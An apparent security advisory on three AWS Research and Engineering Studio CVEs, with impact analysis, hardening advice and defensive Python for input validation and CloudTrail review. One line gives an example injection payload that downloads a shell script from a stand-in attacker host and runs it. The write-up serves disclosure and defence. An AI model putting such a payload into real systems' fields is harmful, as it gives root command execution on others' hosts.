AWS disclosed three high-severity vulnerabilities in Research and Engineering Studio (RES) on April 6, 2026, all carrying CVSS scores of 8.8. The bugs allow any authenticated user to escalate to root on virtual desktop hosts, hijack the instance profile to pivot into other AWS services, or execute arbitrary commands on the cluster manager. If you run RES in any version from 2024.10 through 2025.12.01, stop reading and start patching.

What Is AWS RES?

Research and Engineering Studio is AWS’s managed environment for spinning up HPC and virtual desktop infrastructure. It handles Linux and Windows virtual desktops, shared storage, job scheduling, and user session management — all backed by EC2 instances, DCV connections, and a central cluster-manager service. It’s popular in research labs, financial modeling shops, and engineering orgs that need on-demand compute with centralized admin.

The attack surface matters here: RES is by design multi-tenant and internet-facing, with authenticated researchers interacting through APIs and web consoles. A command injection at this layer gives an attacker lateral movement across the entire RES environment.

The Vulnerabilities

CVE-2026-5707 — Root RCE via Crafted Session Name (CVSS 8.8)

The virtual desktop session creation endpoint passes user-supplied session names directly into OS commands without sanitization. An authenticated user can inject shell metacharacters into the session name field, achieving arbitrary command execution as root on the virtual desktop host EC2 instance.

The root cause is textbook CWE-78 (OS Command Injection): the session name string gets interpolated into a shell command, likely through string concatenation rather than parameterized execution. Exploitation is trivial — a session name like test$(curl attacker.com/shell.sh|bash) would suffice.

Affected versions: 2025.03 through 2025.12.01

CVE-2026-5708 — Privilege Escalation via Unsanitized Session Attributes (CVSS 8.8)

The session creation API also fails to validate user-modifiable attributes beyond just the session name. An authenticated user can craft API requests that manipulate session attributes to assume the Virtual Desktop Host’s EC2 instance profile permissions. This means an attacker can interact with any AWS service the instance profile has access to — S3 buckets, DynamoDB tables, Secrets Manager, other EC2 instances, whatever IAM allows.

This is the more dangerous bug in environments with broadly scoped instance profiles, which is most of them. The blast radius extends well beyond RES into whatever AWS resources the host can reach.

Affected versions: Prior to 2026.03

CVE-2026-5709 — Command Injection via FileBrowser API (CVSS 8.8)

The FileBrowser List Files API endpoint takes file path parameters and passes them to shell commands without sanitization. An authenticated user can inject shell metacharacters into the file path, executing arbitrary commands on the cluster-manager EC2 instance.

Unlike CVE-2026-5707, which targets virtual desktop hosts, this one hits the cluster manager — the central control plane for the entire RES deployment. Compromising the cluster manager means owning the whole environment.

Affected versions: 2024.10 through 2025.12.01
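Both CVE-2026-5707 and CVE-2026-5709 are the same CWE-78 shape: user input reaches a shell. The hardened pattern, as an added example that is not RES's own code, is an allowlist on the session name, confinement of the FileBrowser path to a root directory, and execution with an argument vector instead of a shell string. Function names, the regex, and the sample directory tree are assumptions for illustration.

```python
import re
import subprocess
import tempfile
from pathlib import Path
from typing import List, Optional

# Hypothetical helper names; the real RES handlers are not shown on the page.
SESSION_NAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._-]{0,63}")

def is_safe_session_name(name: str) -> bool:
    """Allowlist check: shell metacharacters ($, |, ;, backticks, newlines) can never pass."""
    return SESSION_NAME_RE.fullmatch(name) is not None

def confined_path(user_path: str, root: Path) -> Optional[Path]:
    """Confine a FileBrowser path to root: drop a leading slash, resolve symlinks,
    return None if the result escapes root."""
    root = root.resolve()
    candidate = (root / user_path.lstrip("/")).resolve()
    if candidate != root and root not in candidate.parents:
        return None
    return candidate

def list_files_safely(user_path: str, root: Path) -> List[str]:
    """List a directory with an argument vector (no shell) after confinement.
    The vulnerable pattern, for contrast: subprocess.run(f"ls {user_path}", shell=True)."""
    target = confined_path(user_path, root)
    if target is None:
        raise ValueError(f"path escapes root: {user_path!r}")
    result = subprocess.run(["ls", "-1", "--", str(target)],
                            capture_output=True, text=True, check=True)
    return sorted(result.stdout.splitlines())

def demo_root() -> Path:
    """Constructed sample tree (not from the page) so the example runs offline."""
    root = Path(tempfile.mkdtemp(prefix="res_fb_"))
    (root / "data").mkdir()
    (root / "data" / "run1.csv").write_text("a,b\n")
    (root / "data" / "notes.txt").write_text("hi\n")
    return root

if __name__ == "__main__":
    r = demo_root()
    print(is_safe_session_name("test$(id)"))   # False: metacharacters rejected
    print(list_files_safely("data", r))        # ['notes.txt', 'run1.csv']
```

With the argument-vector call, a name or path containing metacharacters is at worst a nonexistent file, never a second command.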

Impact Assessment

All three bugs require authentication, but “authenticated” in a research computing context often means “anyone with a university email” or “any contractor in the org.” The barrier is low.

The combination is particularly nasty:

  • CVE-2026-5709 gets you code execution on the cluster manager (control plane)
  • CVE-2026-5707 gets you root on any virtual desktop host (compute plane)
  • CVE-2026-5708 lets you pivot from RES into the broader AWS account via instance profile hijacking

Chained together, an attacker with basic RES user credentials can own the entire RES deployment and then move laterally into the AWS account. In environments running sensitive research workloads — defense, pharma, financial modeling — this is a critical exposure.

There is no evidence of active exploitation in the wild yet, but these bugs are trivially exploitable and proof-of-concept details are effectively public via the GitHub issue tracker.

Mitigation

Upgrade to RES 2026.03. This is the only complete fix and addresses all three CVEs.

If you cannot upgrade immediately, AWS has released backport patches for versions 2025.12.01, 2025.12, 2025.09, 2025.06.01, 2025.06, and 2025.03. Apply the patch script and recycle affected instances.

Additional hardening steps:

  1. Audit instance profiles attached to RES virtual desktop hosts and the cluster manager. Apply least-privilege IAM policies. If your instance profile has s3:* or ec2:*, now is the time to scope it down.
  2. Review RES user access. Remove any accounts that no longer need access. Tighten authentication requirements.
  3. Check CloudTrail for unusual API calls originating from RES EC2 instances, particularly AssumeRole, GetSessionToken, or calls to services your RES workloads don’t normally touch.
  4. Monitor the cluster manager for unexpected processes, outbound connections, or file modifications.
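Steps 1 and 3 as executable checks, added here as an example rather than AWS's own tooling. It runs offline over a constructed policy document and constructed CloudTrail records; the RES role names and the service baseline are assumptions you would replace with your own.

```python
import json

# Constructed sample inputs (not from the page): an instance-profile policy document and a few
# CloudTrail records. The RES role names below are assumed, not the project's real ones.
SAMPLE_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow", "Action": ["s3:*", "ec2:DescribeInstances"], "Resource": "*"},
    {"Effect": "Allow", "Action": "dynamodb:GetItem",
     "Resource": "arn:aws:dynamodb:us-east-1:111122223333:table/example"}
  ]
}""")

RES_ROLE_HINTS = ("res-vdi-host-role", "res-cluster-manager-role")
BASELINE_SERVICES = {"s3.amazonaws.com", "dynamodb.amazonaws.com"}

SAMPLE_EVENTS = [
    {"eventName": "GetObject", "eventSource": "s3.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/res-vdi-host-role/i-0aaa"}},
    {"eventName": "AssumeRole", "eventSource": "sts.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/res-vdi-host-role/i-0aaa"}},
    {"eventName": "GetSecretValue", "eventSource": "secretsmanager.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:sts::111122223333:assumed-role/res-cluster-manager-role/i-0bbb"}},
    {"eventName": "AssumeRole", "eventSource": "sts.amazonaws.com",
     "userIdentity": {"arn": "arn:aws:iam::111122223333:user/admin"}},  # not a RES host, ignored
]

def wildcard_actions(policy: dict) -> list:
    """Step 1: return Allow actions that are service-wide or global wildcards (s3:*, ec2:*, *)."""
    found = []
    for stmt in policy.get("Statement", []):
        if stmt.get("Effect") != "Allow":
            continue
        actions = stmt.get("Action", [])
        actions = [actions] if isinstance(actions, str) else actions
        found.extend(a for a in actions if a == "*" or a.endswith(":*"))
    return found

def suspicious_events(events, hints=RES_ROLE_HINTS, baseline=BASELINE_SERVICES) -> list:
    """Step 3: keep calls made under a RES host role that are STS calls or reach a
    service outside the workload's normal baseline."""
    flagged = []
    for ev in events:
        arn = ev.get("userIdentity", {}).get("arn", "")
        if not any(h in arn for h in hints):
            continue
        if ev["eventName"] in ("AssumeRole", "GetSessionToken") or ev["eventSource"] not in baseline:
            flagged.append((ev["eventName"], ev["eventSource"]))
    return flagged
```

Instance-profile credentials show up in CloudTrail as an assumed-role ARN ending in the instance ID, which is what the role-name filter keys on.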

Timeline

  • March 10, 2026: Issue filed on the aws/res GitHub repository
  • March 26, 2026: Fix merged in RES 2026.03
  • April 6, 2026: CVE-2026-5707, CVE-2026-5708, and CVE-2026-5709 publicly disclosed
